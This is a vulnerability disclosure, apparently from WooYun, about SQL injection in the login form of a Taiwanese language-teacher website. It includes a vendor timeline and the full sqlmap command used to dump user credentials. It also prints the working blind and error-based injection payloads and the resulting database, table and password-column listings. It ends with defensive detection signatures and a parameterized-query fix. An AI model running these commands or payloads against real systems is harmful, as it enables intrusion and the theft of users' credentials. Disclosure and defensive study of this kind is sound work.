WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online------------------http://drop.zone.ci/
2015-11-29: Details reported to the vendor, awaiting vendor handling
2015-11-30: Vendor confirmed; details disclosed to the vendor only
2015-12-10: Details disclosed to core white hats and relevant domain experts
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to intern white hats
2016-01-07: Vendor has fixed the vulnerability and disclosed it proactively; details made public
On our website you can find all English teachers, Spanish teachers, French teachers, German teachers, Italian teachers, Japanese teachers, Korean teachers, Chinese teachers, Taiwanese teachers, and even foreign tutors and foreign teachers of other languages!
Address: http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2
$ python sqlmap.py -u "http://**.**.**.**/login.php?lang=zh&PHPSESSID=dh41qlm6q0v37ck7dteo4u9tv2" -p username --technique=BE --form --random-agent --batch -D myucomtw -T prod_user -C user_id,password,is_admin,hash,email --dump --start 1 --stop 10
Database: myucomtw
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| prod_user | 10081   |
+-----------+---------+
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END)) AND 'snif'='snif&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=&remember=1&login=%E7%99%BB%E9%8C%84&username_forgot=Zojz
---
web server operating system: FreeBSD
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
current user: '**.**.**.**@localhost'
current user is DBA: False
database management system users [1]:
[*] '**.**.**.**'@'localhost'
Database: myucomtw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| prod_userfrom                         | 32981   |
| prod_session                          | 20681   |
| prod_viewed_ad                        | 12802   |
| prod_teacher_feedback                 | 10502   |
| prod_user                             | 10081   |
| prod_teacher_shortlist                | 9850    |
| prod_teacher_location                 | 8688    |
| prod_rss_teachers                     | 7730    |
| prod_student                          | 7553    |
| prod_points_purchase                  | 5638    |
| prod_teacher_deactivations            | 5458    |
| prod_teacher_language                 | 3876    |
| prod_subscriptions_tracking           | 2731    |
| prod_teacher                          | 2662    |
| prod_teacher_emails_to_invite         | 1531    |
| prod_ad                               | 963     |
| test_session                          | 790     |
| prod_ips                              | 699     |
| prod_spam_bots                        | 400     |
| prod_districts                        | 370     |
| test_districts                        | 370     |
| test_userfrom                         | 224     |
| test_points_purchase                  | 219     |
| prod_failed_logins                    | 130     |
| prod_daily_word                       | 128     |
| prod_partner_stats                    | 63      |
| prod_partners                         | 51      |
| prod_business_card                    | 49      |
| test_teacher_location                 | 47      |
| test_teacher_language                 | 41      |
| test_rss_teachers                     | 31      |
| prod_pricelist                        | 30      |
| test_pricelist                        | 30      |
| prod_landing_pages                    | 24      |
| prod_forums_access                    | 19      |
| prod_country                          | 17      |
| test_country                          | 17      |
| test_partner_stats                    | 17      |
| prod_rss_items                        | 15      |
| test_rss_items                        | 15      |
| test_ad                               | 8       |
| test_teacher_feedback                 | 8       |
| prod_offsite_ads                      | 7       |
| test_daily_word                       | 6       |
| test_partners                         | 6       |
| prod_blacklisted_email                | 5       |
| prod_subscriptions                    | 5       |
| test_viewed_ad                        | 5       |
| test_offsite_ads                      | 4       |
| test_teacher_shortlist                | 4       |
| test_business_card                    | 2       |
| test_subscriptions                    | 2       |
| test_subscriptions_tracking           | 2       |
| test_blacklisted_email                | 1       |
| test_ips                              | 1       |
| test_landing_pages                    | 1       |
| test_student                          | 1       |
| test_teacher_emails_to_invite         | 1       |
| test_user                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 2253    |
| STATISTICS                            | 501     |
| SESSION_VARIABLES                     | 444     |
| GLOBAL_VARIABLES                      | 430     |
| GLOBAL_STATUS                         | 341     |
| SESSION_STATUS                        | 341     |
| PARTITIONS                            | 252     |
| TABLES                                | 252     |
| KEY_COLUMN_USAGE                      | 233     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219     |
| COLLATIONS                            | 219     |
| TABLE_CONSTRAINTS                     | 190     |
| PLUGINS                               | 42      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| SCHEMA_PRIVILEGES                     | 32      |
| ENGINES                               | 9       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: myucomtw_forums
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| yphpads_adstats                       | 587104  |
| yphpads_userlog                       | 72232   |
| vb_phrase                             | 15653   |
| vb_post                               | 7619    |
| vb_thread                             | 7374    |
| vb_rsslog                             | 7295    |
| vb_cronlog                            | 7180    |
| vb_adminlog                           | 4015    |
| yphpads_targetstats                   | 2896    |
| vb_stats                              | 2586    |
| vb_threadviews                        | 2108    |
| vb_adminhelp                          | 1394    |
| vb_sigparsed                          | 682     |
| vb_template                           | 415     |
| vb_setting                            | 309     |
| vb_moderatorlog                       | 153     |
| vb_avatar                             | 108     |
| vb_phrasetype                         | 59      |
| vb_settinggroup                       | 40      |
| vb_editlog                            | 37      |
| vb_faq                                | 30      |
| vb_forumpermission                    | 27      |
| vb_datastore                          | 25      |
| yphpads_banners                       | 20      |
| yphpads_zones                         | 18      |
| vb_cron                               | 17      |
| vb_reputationlevel                    | 15      |
| yphpads_cache                         | 15      |
| yphpads_clients                       | 15      |
| vb_icon                               | 14      |
| vb_attachmenttype                     | 11      |
| vb_smilie                             | 11      |
| vb_usergroup                          | 11      |
| vb_pm                                 | 10      |
| vb_paymentinfo                        | 9       |
| vb_announcementread                   | 8       |
| vb_session                            | 8       |
| vb_paymentapi                         | 7       |
| vb_subscriptionlog                    | 7       |
| vb_attachment                         | 6       |
| vb_mh_fl_forum_language               | 6       |
| vb_forum                              | 5       |
| vb_pmtext                             | 5       |
| vb_postparsed                         | 5       |
| vb_announcement                       | 4       |
| vb_imagecategory                      | 4       |
| vb_infractionlevel                    | 4       |
| vb_externalcache                      | 3       |
| vb_style                              | 3       |
| vb_user                               | 3       |
| vb_userfield                          | 3       |
| vb_usertextfield                      | 3       |
| vb_usertitle                          | 3       |
| vb_administrator                      | 2       |
| vb_deletionlog                        | 2       |
| vb_language                           | 2       |
| vb_plugin                             | 2       |
| vb_pollvote                           | 2       |
| vb_productcode                        | 2       |
| vb_profilefield                       | 2       |
| vb_rssfeed                            | 2       |
| vb_adminutil                          | 1       |
| vb_calendar                           | 1       |
| vb_moderator                          | 1       |
| vb_passwordhistory                    | 1       |
| vb_paymenttransaction                 | 1       |
| vb_poll                               | 1       |
| vb_product                            | 1       |
| vb_regimage                           | 1       |
| vb_reputation                         | 1       |
| vb_strikes                            | 1       |
| vb_subscription                       | 1       |
| vb_usergroupleader                    | 1       |
| vb_usergrouprequest                   | 1       |
| yphpads_affiliates                    | 1       |
| yphpads_config                        | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: myucomtw
Table: prod_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: myucomtw
Table: test_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: myucomtw_forums
Table: yphpads_affiliates
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(64) |
+----------+-------------+
Database: myucomtw_forums
Table: vb_forum
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: myucomtw_forums
Table: vb_usergroup
[2 columns]
+-----------------+----------------------+
| Column          | Type                 |
+-----------------+----------------------+
| passwordexpires | smallint(5) unsigned |
| passwordhistory | smallint(5) unsigned |
+-----------------+----------------------+
Database: myucomtw_forums
Table: yphpads_clients
[1 column]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| clientpassword | varchar(64) |
+----------------+-------------+
Database: myucomtw_forums
Table: vb_session
[1 column]
+--------+------------+
| Column | Type       |
+--------+------------+
| bypass | tinyint(4) |
+--------+------------+
Database: myucomtw_forums
Table: vb_user
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(32) |
| passworddate | date        |
+--------------+-------------+
Database: myucomtw_forums
Table: vb_passwordhistory
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(50) |
| passworddate | date        |
+--------------+-------------+
Database: myucomtw
Table: prod_user
[11 columns]
+--------------------------+--------------+
| Column                   | Type         |
+--------------------------+--------------+
| banned                   | tinyint(1)   |
| email                    | varchar(255) |
| hash                     | varchar(255) |
| is_admin                 | tinyint(1)   |
| is_outside_admin         | tinyint(1)   |
| is_valid                 | tinyint(1)   |
| last_login_date          | datetime     |
| password                 | varchar(255) |
| registered_date          | datetime     |
| sent_expire_warning_date | datetime     |
| user_id                  | int(11)      |
+--------------------------+--------------+
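Two defender-side checks for the login.php username injection shown above, as an added example that is not code from the report, the site or the vendor: signature matching over constructed POST bodies for the two sqlmap payload types (RLIKE boolean-based blind and the FLOOR(RAND(0)*2) GROUP BY error-based trick), and a parameterized user lookup that binds the username as data instead of splicing it into the query. The in-memory SQLite stand-in for prod_user, the sample bodies and the function names are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Signatures derived from the two sqlmap payload types in this report:
# the RLIKE boolean-based blind probe, the FLOOR(RAND(0)*2) ... GROUP BY
# duplicate-key error trick, and the string tautology both payloads end with.
SIGNATURES = {
    "boolean_blind_rlike": re.compile(r"'\s*RLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN", re.I),
    "error_based_floor_rand": re.compile(r"FLOOR\(RAND\(0\)\*2\).*?GROUP\s+BY", re.I | re.S),
    "string_tautology": re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\b", re.I),
}

def classify(body: str) -> list[str]:
    """Return the names of all signatures matching a URL-encoded POST body."""
    decoded = unquote_plus(body)  # inspect the decoded form the DBMS would actually see
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def flagged(bodies: list[str]) -> list[int]:
    """Indices of request bodies that match at least one signature."""
    return [i for i, body in enumerate(bodies) if classify(body)]

def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for prod_user (a subset of its real columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE prod_user (user_id INTEGER, email TEXT, password TEXT, is_admin INTEGER)")
    conn.execute("INSERT INTO prod_user VALUES (2, 'admin@example.invalid', '<bcrypt hash>', 1)")
    return conn

def find_user(conn: sqlite3.Connection, username: str):
    """Hardened lookup: the username is bound as a parameter, never concatenated into SQL,
    so a payload like the report's is compared as a literal string and matches no row."""
    return conn.execute(
        "SELECT user_id, is_admin FROM prod_user WHERE email = ?", (username,)
    ).fetchone()

# Constructed POST bodies: the report's two payloads plus one benign login.
SAMPLES = [
    "username=ZiYT' RLIKE (SELECT (CASE WHEN (3224=3224) THEN 0x5a695954 ELSE 0x28 END))"
    " AND 'snif'='snif&password=&remember=1",
    "username=ZiYT' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x7171717871,"
    "(SELECT (ELT(3470=3470,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM"
    " INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GZic'='GZic&password=",
    "username=alice%40example.com&password=hunter2&remember=1",
]

if __name__ == "__main__":
    for i, body in enumerate(SAMPLES):
        print(i, classify(body) or "clean")
    conn = demo_db()
    print(find_user(conn, "admin@example.invalid"))  # (2, 1)
    print(find_user(conn, unquote_plus(SAMPLES[0]).split("&")[0][9:]))  # None
```

The error-based payload only works when the MySQL error text reaches the client, so suppressing database errors in login.php responses removes that channel even before the query itself is fixed.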
Deploy a WAF.
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-11-30 16:56
Thanks for the report.
2016-01-07: Fixed